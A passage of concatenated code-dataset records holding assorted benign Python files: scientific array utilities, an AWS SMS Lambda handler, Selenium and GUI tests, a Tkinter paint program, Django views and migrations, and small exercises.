, 0.2 , 0.4 , 0.4 , 0.2 ],\n [ 0.2 , 0.28284271, 0.4472136 , 0.4472136 , 0.28284271],\n [ 0.4 , 0.4472136 , 0.56568542, 0.56568542, 0.4472136 ],\n [ 0.4 , 0.4472136 , 0.56568542, 0.56568542, 0.4472136 ],\n [ 0.2 , 0.28284271, 0.4472136 , 0.4472136 , 0.28284271]])\n \"\"\"\n # Make sure the input \"shape\" is an iterable.\n try:\n len(shape)\n except TypeError:\n shape = [shape]\n\n # Create a set of coordinates. We can then find the \"distance\" of\n # each point from the origin.\n slices = [slice( -np.floor((dim-1)/2.), np.ceil((dim-1)/2.)+1 ) for dim in shape]\n coordinates = np.mgrid[slices]\n\n # Get the correct normalization - divide each dimension by\n # its size and by the overall resolution.\n for index, dim_size in enumerate(shape):\n coordinates[index] /= (dim_size*resolution)\n\n # If we want a 1D array, then we already have what we want.\n # Don't apply the square and square-root, so that we can\n # keep the negative signs.\n if len(shape)!=1:\n grid = np.sqrt( np.sum( coordinates**2, axis=0 ) )\n else:\n grid = coordinates[0]\n \n for index, dim_size in enumerate(shape):\n grid = np.roll(grid, int(np.ceil((dim_size-1)/2.)+1), axis=index)\n\n return grid\n\ndef makeEllGrid(shape, resolution=1.):\n \"\"\"\n OUTPUT\n 2.*np.pi*makeFFTGrid(shape=shape, resolution=resolution)\n \"\"\"\n return 2.*np.pi*makeFFTGrid(shape=shape, resolution=resolution)\n\n\n\ndef get_bispec_and_variance_one_field( file_names):\n # materialize the map so it can be indexed and len()-ed below (Python 3)\n loaded_files = list(map(bi_inout.load_bispec_output_hdf5, file_names))\n\n # check that the format is right\n fields_to_check = ['field_name', 'bands', 'grid_bands']\n for i in range(1,len(loaded_files)):\n for fc in fields_to_check:\n if( np.any(loaded_files[0][fc] != loaded_files[i][fc]) ):\n raise RuntimeError(\"%s is not the same for some loaded files\"%(fc))\n bispecs = []\n tags = []\n for lf in loaded_files:\n bispecs += list(lf['bispec'])\n tags += list(lf['bispec_tag'])\n # check that there is exactly one 'real' value\n\n print( tags )\n\n assert(tags.count('real') == 1)\n real_ind = tags.index('real')\n\n real_bs = bispecs[real_ind]\n # note: indexing loaded_files with the flattened-tag index assumes one\n # bispectrum per input file\n real_wgts = loaded_files[real_ind]['bispec_weight']\n\n bispecs.pop(real_ind)\n barr = np.array(bispecs)\n\n return real_bs, np.var(barr, axis = 0), real_wgts\n\ndef combine_bispecs_and_variances(bispec_vals, variances):\n wgts = list(map(get_bi_field_weight, variances))\n wsum = sum(wgts)\n wgts = list(map(lambda w: w/wsum, wgts))\n # weighted mean\n wmean = sum(map(lambda i: wgts[i] * bispec_vals[i], range(len(bispec_vals))))\n\n # weighted variance\n wvar = sum(map(lambda i: wgts[i]**2 * variances[i], range(len(bispec_vals))))\n return wmean, wvar\n\n\n\ndef get_bispec_chisq_diff(b0, b_var0, b1, b_var1):\n bad_inds = np.where(b_var0 == 0)\n n_vals = np.size(b0) - np.size(bad_inds)/3\n\n sq_diff = (b0-b1)**2/(b_var0+b_var1)\n sq_diff[bad_inds] = 0\n\n #import pdb; pdb.set_trace()\n\n chisq = np.sum(sq_diff)\n red_chisq = chisq/n_vals\n return chisq, red_chisq\n\n\n\ndef get_bi_field_weight(var_matrix):\n good_inds = np.where(var_matrix != 0)\n return np.median( 1.0/(var_matrix[good_inds]))\n\n\nif __name__ == '__main__':\n import argparse, bi_inout\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--input_files', nargs='+', help='bork', required=True)\n parser.add_argument('--output_file', help='bork', required=True)\n parser.add_argument('--combining_fields', action='store_true')\n #parser.add_argument('--fill_in_initial_ellvec', action='store_true')\n\n args = parser.parse_args()\n if args.combining_fields:\n bvals = []\n variances = []\n field_dics 
= list(map(bi_inout.load_bispec_field_output_hdf5, args.input_files))\n for fdic in field_dics:\n bvals.append(fdic['bispec'])\n variances.append(fdic['bispec_variance'])\n fvals = field_dics[0]\n\n bmean, bvar = combine_bispecs_and_variances(bvals, variances)\n bi_inout.store_bispec_field_output_hdf5(args.output_file, bmean, bvar, bvar*0, \"all_of_them\", \n fvals['bands'], fvals['grid_bands'], fvals['bispec_tag'], \n fvals['ell_vec'], fvals['delta_ell'])\n \n\n else:\n bi, var, wgts = get_bispec_and_variance_one_field(args.input_files)\n fvals = bi_inout.load_bispec_output_hdf5(args.input_files[0])\n print( 'storing output' )\n bi_inout.store_bispec_field_output_hdf5(args.output_file, bi, var, wgts, fvals['field_name'], \n fvals['bands'], fvals['grid_bands'], fvals['bispec_tag'], \n fvals['ell_vec'], fvals['delta_ell'])\n \n \n","sub_path":"mapspectra/python/bi_anal_utils.py","file_name":"bi_anal_utils.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271503058","text":"import boto3\n\ndef lambda_handler(event, context):\n\n client = boto3.client(\"sns\")\n\n topic = client.create_topic(Name=event['Topic'])\n topic_arn = topic['TopicArn']\n\n for number in event['Numbers']:\n client.subscribe(\n TopicArn=topic_arn,\n Protocol='sms',\n Endpoint=number\n )\n\n client.publish(Message=event['Message'], TopicArn=topic_arn)\n","sub_path":"lambda_code/sms-send/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"131145390","text":"from selenium import webdriver\nimport unittest\nimport time\n\nclass MyTest(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.implicitly_wait(10)\n self.base_url='http://www.youdao.com'\n def test_youdao(self):\n driver=self.driver\n driver.get(self.base_url)\n driver.find_element_by_xpath('//*[@id=\"translateContent\"]').click()\n driver.find_element_by_xpath('//*[@id=\"translateContent\"]').send_keys('webdriver')\n driver.find_element_by_xpath('//*[@id=\"form\"]/button').click()\n time.sleep(2)\n title=driver.title\n self.assertEqual(title,u'【webdriver】什么意思_英语webdriver的翻译_音标_读音_用法_例句_在线翻译_有道词典')\n def tearDown(self):\n pass\nif __name__=='__main__':\n unittest.main()\n\n","sub_path":"unit/test_youdao.py","file_name":"test_youdao.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150278858","text":"data = list(map(int, input(\"enter x1,y1,x2,y2,x3,y3,x4,y4 values: \").split()))\nx1, y1, x2, y2, x3, y3, x4, y4 = data\n\n# print(x1,y1,x2,y2,x3,y3,x4,y4)\n\npq = [[x1, y1], [x2, y2]]\nrs = [[x3, y3], [x4, y4]]\n# print(pq[0][1], rs)\n\n\ndef slope(point: list):\n up = point[1][1] - point[0][1]\n down = point[1][0] - point[0][0]\n if down == 0:\n return float(\"inf\") # vertical line\n return up / down\n\n\nif slope(pq) == slope(rs):\n print(\"lines are parallel\")\nelse:\n print(\"not parallel\")\n","sub_path":"q43.py","file_name":"q43.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382634795","text":"\"\"\"\nzeroterm is a light weight terminal allowing both:\n* lines written one after another (normal terminal/console behaviour)\n* fixed position text\n\nNote: Requires an ANSI 
terminal. For Windows 7, please download https://github.com/downloads/adoxa/ansicon/ansi160.zip and run ansicon.exe -i to install it.\n\"\"\"\n\nfrom sys import stdout\nimport time\n\nclass zeroterm:\n def __init__(self, nrow=10, ncol=200): # nrow, ncol determines the size of the scrolling (=normal terminal behaviour) part of the screen\n stdout.write(\"\\x1b[2J\") # clear screen\n self.nrow = nrow\n self.ncol = ncol\n self.buf = []\n\n def write(self, s, x=None, y=None): # if no x,y specified, normal console behaviour\n if x is not None and y is not None: # if x,y specified, fixed text position\n self.movepos(x,y)\n print (s)\n else:\n if len(self.buf) < self.nrow:\n self.buf.append(s)\n else:\n self.buf[:-1] = self.buf[1:]\n self.buf[-1] = s\n\n for i, r in enumerate(self.buf):\n self.movepos(i+1,0)\n print ( r[:self.ncol].ljust(self.ncol) )\n\n def movepos(self, row, col):\n stdout.write(\"\\x1b[%d;%dH\" % (row, col))\n# end class zeroterm\n","sub_path":"Baixar Musicas/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"220842233","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport concepts.managers\nimport djorm_pgarray.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('concepts', '0001_initial'),\n ('core_media', '0004_add_archived_and_prune'),\n ('quizwhiz', '0002_add_edumetadata'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='quiz',\n name='introduction',\n field=models.TextField(default=b'', verbose_name='introduction', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='quiz',\n name='key_image',\n field=models.ForeignKey(verbose_name='key_image', blank=True, to='core_media.NGPhoto', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='quiz',\n name='concept_items',\n field=concepts.managers.ConceptManager(to='concepts.Concept', through='concepts.ConceptItem', help_text='Press return to complete each tag.', verbose_name='Concepts'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='question',\n name='answers',\n field=djorm_pgarray.fields.TextArrayField(help_text=b'Press return to save a new answer. Double click an existing answer to edit. 
Click the circle next to the correct answer.', dbtype='text'),\n preserve_default=True,\n ),\n ]\n","sub_path":"quizwhiz/migrations/0003_add_intro_key_image_concept.py","file_name":"0003_add_intro_key_image_concept.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140719928","text":"# Your code here\nwith open(\"applications/histo/robin.txt\") as f:\n s = f.read()\n\nimport re #import regex module\ndef hist(s):\n counts = {}\n s = s.lower()\n # get rid of punctuation\n s = re.sub(r'[^\\w\\s]','', s) #regular expression replacement with re.sub\n # iterate through each word in the sentence using split\n for word in s.split():\n # if it's the first time seeing the key\n if word not in counts:\n # set the value to 1\n counts[word] = 1\n # if it's a duplicate key\n else:\n # add 1 to the value\n counts[word] += 1\n # sort dictionary\n list_of_items = list(counts.items())\n list_of_items.sort(key = lambda x: -x[1])\n # iterate through each tuple in the list to construct histogram\n for word, count in list_of_items:\n print(f\"{word:<15} {count * '#'}\")\n\nhist(s)\n","sub_path":"applications/histo/histo.py","file_name":"histo.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"23518883","text":"import sys\nimport ldtp\nimport Image\nimport ImageChops\nfrom commandes_bases import *\n\nconnecter()\n\ntraiterFiche()\n\nfenetre = \"*Traitement d'une fiche de maintenance*\"\nldtp.waittillguiexist(fenetre)\n\nldtp.mouseleftclick(fenetre, 'txtFiche#13')\nldtp.keypress('')\nldtp.keypress('a')\nldtp.keyrelease('')\nldtp.keypress('')\nldtp.keyrelease('')\nldtp.enterstring(fenetre, 'txtFiche#13', 'allo mon grand')\nldtp.click(fenetre, 'btnCancel')\n\nldtp.click('*Gestion de dossiers*', 'btnTraiter')\nldtp.waittillguiexist(fenetre)\n\ncoordinate = ldtp.getwindowsize(fenetre)\nif (len(sys.argv) > 1) and (sys.argv[1] == 'origin'):\n\tldtp.imagecapture(fenetre, 'images/traiter_fiche_commentaire_basse_origin.png',\n coordinate[0], coordinate[1], coordinate[2], coordinate[3])\nelse:\n ldtp.imagecapture(fenetre, 'images/traiter_fiche_commentaire_basse.png',\n coordinate[0], coordinate[1], coordinate[2], coordinate[3])\n im1 = Image.open(\"images/traiter_fiche_commentaire_basse.png\")\n im2 = Image.open(\"images/traiter_fiche_commentaire_basse_origin.png\")\n diff = ImageChops.difference(im2, im1)\n if diff.getbbox():\n print(\"Erreur possible dans 'Traitement fiche test: commentaire basse'\")\n\nldtp.click(fenetre, 'btnSaveEnter')\nfermer()\n","sub_path":"tests/traiter_fiche_annuler.py","file_name":"traiter_fiche_annuler.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579162160","text":"from tkinter import *\r\n\r\n\r\n# PROCEDURES\r\n######################################################################\r\n\r\n# Shapes - different procedure for each shape that you choose\r\ndef draw_shape(event):\r\n x = event.x\r\n y = event.y\r\n d = brushVar.get()\r\n width = widthVar.get()\r\n height = heightVar.get()\r\n\r\n if shapeVar.get() == 1:\r\n cv.bind(\"\", draw_shape)\r\n cv.create_oval(x-d, y-d, x+d, y+d, fill=colourVar.get(), outline=colourVar.get())\r\n if shapeVar.get() == 4:\r\n cv.unbind(\"\")\r\n cv.create_text(x, y, text=customText.get(), fill=colourVar.get(), font=f'Times, {fontVar.get()}')\r\n elif 
fillVar.get() == 1:\r\n if shapeVar.get() == 2:\r\n cv.unbind(\"\")\r\n cv.create_rectangle(x-width, y-height, x+width, y+height, outline=colourVar.get())\r\n elif shapeVar.get() == 3:\r\n cv.unbind(\"\")\r\n cv.create_oval(x-width, y-height, x+width, y+height, outline=colourVar.get())\r\n elif fillVar.get() == 0:\r\n if shapeVar.get() == 2:\r\n cv.unbind(\"\")\r\n cv.create_rectangle(x-width, y-height, x+width, y+height, fill=colourVar.get(), outline=colourVar.get())\r\n elif shapeVar.get() == 3:\r\n cv.unbind(\"\")\r\n cv.create_oval(x-width, y-height, x+width, y+height, fill=colourVar.get(), outline=colourVar.get())\r\n\r\n\r\ndef show_settings():\r\n if shapeVar.get() == 2 or shapeVar.get() == 3:\r\n shapeSettingsFrame.grid(row=4, column=3)\r\n widthLabel.grid(row=1, column=1, padx=5, pady=(5, 2), sticky=W)\r\n widthSpin.grid(row=2, column=1, padx=5, pady=(0, 5))\r\n heightLabel.grid(row=3, column=1, padx=5, pady=(5, 2), sticky=W)\r\n heightSpin.grid(row=4, column=1, padx=5, pady=(0, 5))\r\n fillCheck.grid(row=5, column=3, padx=20, sticky=NW)\r\n changeTextButton.grid_remove()\r\n fontSpin.grid_remove()\r\n brushSize.grid_remove()\r\n elif shapeVar.get() == 4:\r\n shapeSettingsFrame.grid(row=4, column=3)\r\n changeTextButton.grid(row=1, column=1, padx=10, pady=(10, 5))\r\n fontSpin.grid(row=2, column=1, padx=10, pady=(5, 10))\r\n widthLabel.grid_remove()\r\n widthSpin.grid_remove()\r\n heightLabel.grid_remove()\r\n heightSpin.grid_remove()\r\n brushSize.grid_remove()\r\n fillCheck.grid_remove()\r\n else:\r\n shapeSettingsFrame.grid_remove()\r\n widthLabel.grid_remove()\r\n widthSpin.grid_remove()\r\n heightLabel.grid_remove()\r\n heightSpin.grid_remove()\r\n changeTextButton.grid_remove()\r\n fontSpin.grid_remove()\r\n fillCheck.grid_remove()\r\n brushSize.grid(row=1, rowspan=2, column=3)\r\n\r\n\r\n# Brush Customization - change brush size and preset colour (RGB Window for custom colours)\r\ndef change_brush_colour(c):\r\n colourVar.set(c)\r\n\r\n\r\n# Change Text Window - top-level widget used to customize text that is placed on the canvas\r\ndef change_text():\r\n text_var = create_change_text_window()\r\n\r\n customText.set(text_var)\r\n\r\n\r\ndef create_change_text_window():\r\n t = Toplevel()\r\n t.title(\"Change Text\")\r\n\r\n text_var = StringVar()\r\n text_entry = Entry(t, width=100, textvariable=text_var)\r\n\r\n apply = Button(t, text=\"Apply\", command=t.destroy)\r\n\r\n text_entry.grid(row=1, column=1, padx=20, pady=(20, 5))\r\n apply.grid(row=2, column=1, pady=(5, 20))\r\n\r\n t.wait_window()\r\n\r\n text = text_var.get()\r\n\r\n return text\r\n\r\n\r\n# Resize Canvas Window - top-level widget used to resize the canvas\r\ndef resize_canvas():\r\n dim = create_resize_window()\r\n\r\n cv.config(width=dim[0], height=dim[1])\r\n\r\n\r\ndef create_resize_window():\r\n t = Toplevel()\r\n t.title(\"Resize Canvas\")\r\n\r\n width_label = Label(t, text=\"Width\")\r\n height_label = Label(t, text=\"Height\")\r\n\r\n w_var = IntVar()\r\n w_var.set(1100)\r\n width_spin = Spinbox(t, width=10, textvariable=w_var, from_=50, to=1100)\r\n\r\n h_var = IntVar()\r\n h_var.set(500)\r\n height_spin = Spinbox(t, width=10, textvariable=h_var, from_=50, to=500)\r\n\r\n apply = Button(t, text=\"Apply\", command=t.destroy)\r\n\r\n t.grid()\r\n width_label.grid(row=1, column=1, padx=(70, 5), pady=(10, 5), sticky=E)\r\n width_spin.grid(row=1, column=2, padx=(0, 70), pady=(10, 5))\r\n height_label.grid(row=2, column=1, padx=(70, 5), pady=(5, 0), sticky=E)\r\n height_spin.grid(row=2, column=2, 
padx=(0, 70), pady=(5, 0))\r\n apply.grid(row=3, column=1, columnspan=2, pady=10)\r\n\r\n t.wait_window()\r\n\r\n dimensions = [w_var.get(), h_var.get()]\r\n\r\n return dimensions\r\n\r\n\r\n# RGB Window - top-level widget used to create/use custom colours\r\ndef more_colours():\r\n custom_colour = create_rgb_window()\r\n\r\n colourVar.set(custom_colour.get())\r\n\r\n\r\ndef create_rgb_window():\r\n t = Toplevel()\r\n t.title(\"RGB Colour Picker\")\r\n\r\n def change_frame_colour(self):\r\n red = r_var.get()\r\n green = g_var.get()\r\n blue = b_var.get()\r\n\r\n rgb = f'#{red:02x}{green:02x}{blue:02x}'\r\n\r\n colour_frame.config(bg=rgb)\r\n moreColour.config(bg=rgb)\r\n colour_hex.set(rgb)\r\n colourVar.set(rgb)\r\n\r\n colour_frame = Frame(t)\r\n colour_frame.config(bg=\"#000000\")\r\n\r\n r_var = IntVar()\r\n red_scale = Scale(t, troughcolor=\"#ff0000\", variable=r_var, command=change_frame_colour, from_=0, to=255,\r\n label=\"RED\", orient=HORIZONTAL)\r\n\r\n g_var = IntVar()\r\n green_scale = Scale(t, troughcolor=\"#00ff00\", variable=g_var, command=change_frame_colour, from_=0, to=255,\r\n label=\"GREEN\", orient=HORIZONTAL)\r\n\r\n b_var = IntVar()\r\n blue_scale = Scale(t, troughcolor=\"#0000ff\", variable=b_var, command=change_frame_colour, from_=0, to=255,\r\n label=\"BLUE\", orient=HORIZONTAL)\r\n\r\n colour_hex = StringVar()\r\n colour_hex.set(\"#000000\")\r\n colour_label = Label(t, textvariable=colour_hex)\r\n\r\n apply = Button(t, text=\"Apply\", command=t.destroy)\r\n\r\n t.grid()\r\n colour_frame.grid(row=1, rowspan=4, column=2, pady=20, padx=20, ipadx=100, ipady=100)\r\n red_scale.grid(row=1, column=1)\r\n green_scale.grid(row=2, column=1)\r\n blue_scale.grid(row=3, column=1)\r\n colour_label.grid(row=4, column=1)\r\n apply.grid(row=5, column=1, columnspan=2, pady=20)\r\n\r\n t.wait_window()\r\n return colourVar\r\n\r\n\r\n# Canvas Options\r\ndef clear_canvas():\r\n cv.delete(ALL)\r\n\r\n\r\n# MAIN\r\n######################################################################\r\nroot = Tk()\r\nroot.title(\"Paints\")\r\nmainframe = Frame(root)\r\n\r\ncolourFrame = LabelFrame(mainframe, text=\"Colour\")\r\nshapeFrame = LabelFrame(mainframe, text=\"Shape\")\r\nshapeSettingsFrame = LabelFrame(mainframe, text=\"Settings\")\r\n\r\n\r\n# WIDGETS\r\n######################################################################\r\n\r\n# create canvas\r\ncv = Canvas(mainframe, width=800, height=500, bg=\"#ffffff\")\r\ncv.bind(\"\", draw_shape)\r\n\r\n# colour of brush\r\ncolourVar = StringVar()\r\ncolourVar.set(\"#000000\")\r\n\r\ncustomText = StringVar()\r\ncustomText.set(\"Press 'Change Text' Button in Settings to Customize\")\r\n\r\n# preset colours for brush\r\nwhiteColour = Button(colourFrame, bg=\"#ffffff\", command=lambda: change_brush_colour(\"#ffffff\"))\r\nblackColour = Button(colourFrame, bg=\"#000000\", command=lambda: change_brush_colour(\"#000000\"))\r\nredColour = Button(colourFrame, bg=\"#ff0000\", command=lambda: change_brush_colour(\"#ff0000\"))\r\norangeColour = Button(colourFrame, bg=\"#ffaa00\", command=lambda: change_brush_colour(\"#ffaa00\"))\r\nyellowColour = Button(colourFrame, bg=\"#ffff00\", command=lambda: change_brush_colour(\"#ffff00\"))\r\nlimeColour = Button(colourFrame, bg=\"#aaff00\", command=lambda: change_brush_colour(\"#aaff00\"))\r\ngreenColour = Button(colourFrame, bg=\"#00ff00\", command=lambda: change_brush_colour(\"#00ff00\"))\r\nmintColour = Button(colourFrame, bg=\"#00ffaa\", command=lambda: change_brush_colour(\"#00ffaa\"))\r\naquaColour = 
Button(colourFrame, bg=\"#00ffff\", command=lambda: change_brush_colour(\"#00ffff\"))\r\nskyblueColour = Button(colourFrame, bg=\"#00aaff\", command=lambda: change_brush_colour(\"#00aaff\"))\r\nblueColour = Button(colourFrame, bg=\"#0000ff\", command=lambda: change_brush_colour(\"#0000ff\"))\r\npurpleColour = Button(colourFrame, bg=\"#aa00ff\", command=lambda: change_brush_colour(\"#aa00ff\"))\r\nmagentaColour = Button(colourFrame, bg=\"#ff00ff\", command=lambda: change_brush_colour(\"#ff00ff\"))\r\npinkColour = Button(colourFrame, bg=\"#ff00aa\", command=lambda: change_brush_colour(\"#ff00aa\"))\r\n# custom colour\r\nmoreColour = Button(colourFrame, text=\"More Colours\", command=more_colours)\r\n\r\n# brush size slider\r\nbrushVar = IntVar()\r\nbrushVar.set(5)\r\nbrushSize = Scale(mainframe, variable=brushVar, from_=1, to=50, width=25, length=150,\r\n label=\"BRUSH SIZE\", orient=VERTICAL)\r\n\r\n# shape radio buttons\r\nshapeVar = IntVar()\r\nshapeVar.set(1)\r\nlineRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Line\", value=1, command=show_settings)\r\nrectRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Rectangle\", value=2, command=show_settings)\r\novalRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Oval\", value=3, command=show_settings)\r\ntextRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Text\", value=4, command=show_settings)\r\n\r\n# shape settings\r\nwidthLabel = Label(shapeSettingsFrame, text=\"Width\")\r\nheightLabel = Label(shapeSettingsFrame, text=\"Height\")\r\n\r\nwidthVar = IntVar()\r\nwidthVar.set(10)\r\nwidthSpin = Spinbox(shapeSettingsFrame, width=10, textvariable=widthVar, from_=1, to=550)\r\n\r\nheightVar = IntVar()\r\nheightVar.set(10)\r\nheightSpin = Spinbox(shapeSettingsFrame, width=10, textvariable=heightVar, from_=1, to=250)\r\n\r\nchangeTextButton = Button(shapeSettingsFrame, text=\"Change Text\", command=change_text)\r\n\r\nfontVar = IntVar()\r\nfontVar.set(8)\r\nfontSpin = Spinbox(shapeSettingsFrame, width=10, textvariable=fontVar, from_=1, to=50)\r\n\r\n# fill / no fill\r\nfillVar = IntVar()\r\nfillCheck = Checkbutton(mainframe, variable=fillVar, text=\"No fill\", onvalue=1, offvalue=0)\r\n\r\n# canvas options\r\nresizeButton = Button(mainframe, text=\"Resize Canvas\", command=resize_canvas)\r\nclearButton = Button(mainframe, text=\"Clear\", command=clear_canvas)\r\n\r\n\r\n# GRID\r\n######################################################################\r\nmainframe.grid(padx=15, pady=15)\r\n\r\n# Colour frame\r\ncolourFrame.grid(row=1, column=1, sticky=NW)\r\nwhiteColour.grid(row=1, column=1, ipadx=15, ipady=10, padx=5, pady=(0, 5))\r\nblackColour.grid(row=1, column=2, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nredColour.grid(row=1, column=3, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\norangeColour.grid(row=1, column=4, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nyellowColour.grid(row=1, column=5, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nlimeColour.grid(row=1, column=6, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\ngreenColour.grid(row=1, column=7, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nmintColour.grid(row=1, column=8, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\naquaColour.grid(row=1, column=9, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nskyblueColour.grid(row=1, column=10, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nblueColour.grid(row=1, column=11, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\npurpleColour.grid(row=1, column=12, ipadx=15, ipady=10, padx=(0, 
5), pady=(0, 5))\r\nmagentaColour.grid(row=1, column=13, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\npinkColour.grid(row=1, column=14, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nmoreColour.grid(row=1, column=15, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\n\r\n# Options\r\nbrushSize.grid(row=1, rowspan=2, column=3)\r\n\r\nshapeFrame.grid(row=3, column=3)\r\nlineRadio.grid(row=1, sticky=W)\r\nrectRadio.grid(row=2, sticky=W)\r\novalRadio.grid(row=4, sticky=W)\r\ntextRadio.grid(row=5, sticky=W)\r\n\r\n# Canvas\r\ncv.grid(row=2, rowspan=4, column=1, columnspan=2, pady=10, sticky=W)\r\nresizeButton.grid(row=6, column=1, sticky=W)\r\nclearButton.grid(row=6, column=2, sticky=E)\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"Paints.py","file_name":"Paints.py","file_ext":"py","file_size_in_byte":12022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"298411284","text":"import numpy as np\nx = np.array([3,6,5])\nprint(x.shape) # (3,)\n\n# (1)\nfrom tensorflow.keras.utils import to_categorical\n\nx = to_categorical(x) \nprint(x)\n'''\n  0  1  2  3  4  5  6\n[[0. 0. 0. 1. 0. 0. 0.] --> 3\n [0. 0. 0. 0. 0. 0. 1.] --> 6\n [0. 0. 0. 0. 0. 1. 0.]] --> 5\n '''\nprint(x.shape) # (3, 7)\n\n# (2)\ny = np.array([3,6,5])\nfrom sklearn.preprocessing import OneHotEncoder\n\ny = y.reshape(-1,1)\nprint(y)\n'''\n[[3]\n [6]\n [5]]\n '''\nencoder = OneHotEncoder()\nencoder.fit(y)\ny = encoder.transform(y).toarray() # toarray(): converts a list into an array.\nprint(y)\n'''\n  3  5  6\n[[1. 0. 0.] --> 3\n [0. 0. 1.] --> 6\n [0. 1. 0.]] --> 5\n '''\nprint(y.shape) # (3, 3)","sub_path":"keras/keras22_0_2OneHotEncoder.py","file_name":"keras22_0_2OneHotEncoder.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"568567858","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport json\n\n# function that reads a JSON file\ndef jsonTextReader(jFP):\n    with open(jFP, \"r\", encoding='utf-8') as f:\n        return json.load(f)\n\n# function that converts a string into a list of \"sentences\"\ndef text2Sentence(tet):\n    for i in (\"...\",\"…\"):\n        tet=tet.replace(i,\"\")\n    for i in (\",\",\"。\",\"、\",\",\"):\n        if '2,718' in tet:\n            tet=tet.replace('2,718',\"2718\")\n        tet=tet.replace(i,\"<sep>\")  # mark each sentence boundary with a sentinel token\n        tet=tet.replace('2718',\"2,718\")\n    tet=tet.split(\"<sep>\")[:-1]\n    return tet\n\nif __name__== \"__main__\":\n    # set the path of the news.json file to read\n    NewsJP = \"./example/news.json\"\n\n    # open news.json with the [read JSON] function\n    jtext = jsonTextReader(NewsJP)[\"text\"]\n\n    # pass the string that was read to the [string to \"sentence\" list] function and store it as newsLIST\n    newsLIST = text2Sentence(jtext)\n\n    # set the path of the test.json file to read\n    TestJP = \"./example/test.json\"\n\n    # read the sentence list from test.json and store it as testLIST\n    testLIST = jsonTextReader(TestJP)[\"sentence\"]\n\n    # check whether the homework requirement is met\n    if newsLIST == testLIST:\n        print(\"Homework passed!\")\n    else:\n        print(\"Homework not passed, please go back and revise or post for help!\")\n","sub_path":"week06/week06_40947029S.py","file_name":"week06_40947029S.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577768804","text":"from django.shortcuts import HttpResponse\nimport json\n\ndef select_volume(request):\n    if request.method == \"GET\":\n        return HttpResponse(\"error\")\n    elif request.method == \"POST\":\n        volume_name = request.POST.get('volume_name')\n\n        target_info = [\n            {'target_name': 'target11111', 'lun_num': 5},\n            {'target_name': 'target22222', 'lun_num': 2}\n        ]\n\n        volume_info = [\n            {'volume_name': 'volume1', 'volume_capacity': 200, 'volume_free_cap': 180},\n            
{'volume_name': 'volume2', 'volume_capacity': 300, 'volume_free_cap': 280},\n            {'volume_name': 'volume3', 'volume_capacity': 400, 'volume_free_cap': 380},\n        ]\n\n        info = {\n            'target_info': target_info,\n            'volume_info': volume_info,\n        }\n        return HttpResponse(json.dumps(info), content_type='application/json')\n\ndef select_target(request):\n    if request.method == \"GET\":\n        return HttpResponse(\"error\")\n    elif request.method == \"POST\":\n        target_name = request.POST.get('target_name')\n\n        target_info = [\n            {'target_name': 'target11111', 'lun_num': 5},\n            {'target_name': 'target22222', 'lun_num': 2}\n        ]\n\n        return HttpResponse(json.dumps(target_info), content_type='application/json')","sub_path":"web/change_volume.py","file_name":"change_volume.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639713504","text":"import compas\nfrom compas.datastructures import Mesh\nfrom compas.geometry import centroid_points_xy\nfrom compas_plotters import MeshPlotter\n\nimport compas_libigl as igl\n\nV = [[0, 0, 0], [10, 0, 0], [10, 10, 0], 